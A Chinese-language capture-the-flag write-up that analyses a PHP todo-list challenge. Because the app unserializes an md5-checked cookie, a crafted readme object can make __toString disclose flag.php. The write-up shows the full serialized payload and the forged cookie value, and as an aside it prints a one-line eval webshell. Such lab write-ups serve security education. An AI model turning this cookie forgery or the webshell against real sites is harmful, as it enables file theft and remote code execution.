一、源码分析
首先看源代码:
<?php
Class readme{
public function __toString()
{
return highlight_file('Readme.txt', true).highlight_file($this->source, true);
}
}
if(isset($_GET['source'])){
$s = new readme();
$s->source = __FILE__;
echo $s;
exit;
}
//$todos = [];
if(isset($_COOKIE['todos'])){
$c = $_COOKIE['todos'];
$h = substr($c, 0, 32);
$m = substr($c, 32);
if(md5($m) === $h){
$todos = unserialize($m);
}
}
if(isset($_POST['text'])){
$todo = $_POST['text'];
$todos[] = $todo;
$m = serialize($todos);
$h = md5($m);
setcookie('todos', $h.$m);
header('Location: '.$_SERVER['REQUEST_URI']);
exit;
}
?>
<html>
<head>
</head>
<h1>Readme</h1>
<a href="?source"><h2>Check Code</h2></a>
<ul>
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
</ul>
<form method="post" href=".">
<textarea name="text"></textarea>
<input type="submit" value="store">
</form>
分析源代码:
从源码中看到,定义了一个类,名称为readme。readme中使用了__toString()函数,这个函数是PHP中几个常见的魔术方法之一(魔术方法指的是满足一定条件会自动触发的函数),该方法当有对象被当做字符串输出时就会自动触发。注意这里指的是把类实例化后的对象,而不是变量。
源码第三行中的highlight_file()函数的语法为:
highlight_file(filename,return)
该函数是对文件内容进行语法高亮显示,这里的return如果该为true,则函数会返回高亮处理后的代码。
接着看下面的代码:
这表示如果对source参数进行了GET传参,就会将readme这个类实例化出一个对象,为$s
该对象会调用source方法并赋值为该脚本的绝对路径。下一行的echo $s表示将该对象当成字符串输出,这意味着前面的__toString函数将自动触发。
看到末尾有个exit,这意味着代码执行到这里时就会停止执行,这意味着__FILE__将无法改为指定的值,也就是该参数不可控。
接着看cookie传参部分的代码:
看到其中出现了一个substr()函数为,该函数的语法为:
substr(string,start,length)
这里start参数表示字符串切割的起始位置,是必填参数,length参数是可选的,默认为切割至字符串的末尾。
因此这里代码就很好理解了:
substr($c, 0, 32); \\表示截取字符串c的前32位(包括第32位),
substr($c, 32);\\表示截取字符串的第32位后的全部(不包括第32位)。
结合后面的if中的条件,这里可以得出结论:
传入的cookie参数的字符串是由$h和$m组成,而$h实际上就是$m经过md5加密后的值。
再看下面POST传参中的代码,实际上这段代码的含义是读取用户通过POST传参传递给text参数的字符串,然后对其进行序列化后,一部分进行md5加密,另一部分保持不变,再组合成新的字符串,并设置为cookie参数,参数名为todos。
最后是设置header的location参数,用预定义变量获取URI(统一资源标识符)。
再看页面上的输出点:
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
//键值分离,并输出$todo的值
这里涉及了php的一种特殊写法,例如常见的一句话木马的写法一般是这么写:
<?php eval($_REQUEST[8])?>
实际上也可以这么写:
<?=eval($_REQUEST[8])?>
这里如果是函数,则=号会自动转换为php,而如果是变量,则会输出这个变量的值,例如:
<?=$a=1?> //相当于<?php echo $a=1 ?>
执行后会输出1。
二、传参分析
通过对靶场的源码分析,了解了源代码的基本内容和含义,
可以确定这里的GET和POST方法均为干扰选项,因此应重点看cookie传参的源码。
接下来考虑如何进行传参以访问flag.php文件。
根据靶场的源代码,如果能将$source的值改为’flag.php’即可输出flag.php的内容。
现在需要完成两个步骤,分别是寻找反序列化函数和输出点。
反序列函数所在的位置需要进行cookie传参才能访问到。会将对象当成字符串输出的点有两个,一个是GET传参中的echo,还有一个则是页面上的输出点。很显然,GET传参部分的代码中有exit,因此无法运行到后面的代码,也就无法获取cookie传参,无法被利用。因此这里需要从页面上的输出点入手。
通过分析源代码,我们传入的参数需要经过反序列化函数处理,输出点是foreach函数,而foreach函数里的$todos必须是数组,因此这里需要将传参进行序列化,并以数组的形式传进去。
将部分源代码复制,到本地修改部分代码,因为要访问的是flag.php,并且需要将数据序列化,因此修改代码如图所示:
<?PHP
Class readme{
public function __toString()
{
return highlight_file('Readme.txt', true).highlight_file($this->source, true);
}
}
$s = new readme();
$s -> source ='flag.php';
$s=[$s];
/*
这里要注意,使用[]来定义短数组的方法只有在PHP版本>=5.4时才能用,否则需要用array()函数来定义数组
*/
echo serialize($s);
exit;
?>
最后输出:
a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}
现在还需要分析如何让反序列化函数执行我们传入的参数,看源代码:
if(isset($_COOKIE['todos'])){
$c = $_COOKIE['todos'];
$h = substr($c, 0, 32);
$m = substr($c, 32);
if(md5($m) === $h){
$todos = unserialize($m);
}
传参需要以cookie的形式传入,且会经过字符串处理函数进行切割。输入的参数由$c接收,该参数会被分割为$h和$m,而$h实际上就是$m经过md5加密后的值。
所以总结下来,要满足本题的条件,三个变量的值应当分别如下:
$h=e2d4f7dcc43ee1db7f69e76303d0105c
$m=a:1:{
i:0;O:6:"readme":1:{
s:6:"source";s:8:"flag.php";}}
$c=e2d4f7dcc43ee1db7f69e76303d0105ca:1:{
i:0;O:6:"readme":1:{
s:6:"source";s:8:"flag.php";}}
因此这里只要用$c的值对todos参数进行cookie传参即可获得flag的值。
要进行cookie传参,有多种方法,可以通过插件、控制台、或者抓包工具。
如果用抓包的方式传参需要进行一次URL编码,这里采用burp来传参,先对传参进行一次URL编码:
e2d4f7dcc43ee1db7f69e76303d0105ca%3A1%3A%7Bi%3A0%3BO%3A6%3A%22readme%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D
然后抓包传参即可。
三、小结
本文分享了一道反序列化的CTF题,并详细分析了源码和传参的设置,希望对大家学习渗透测试有帮助。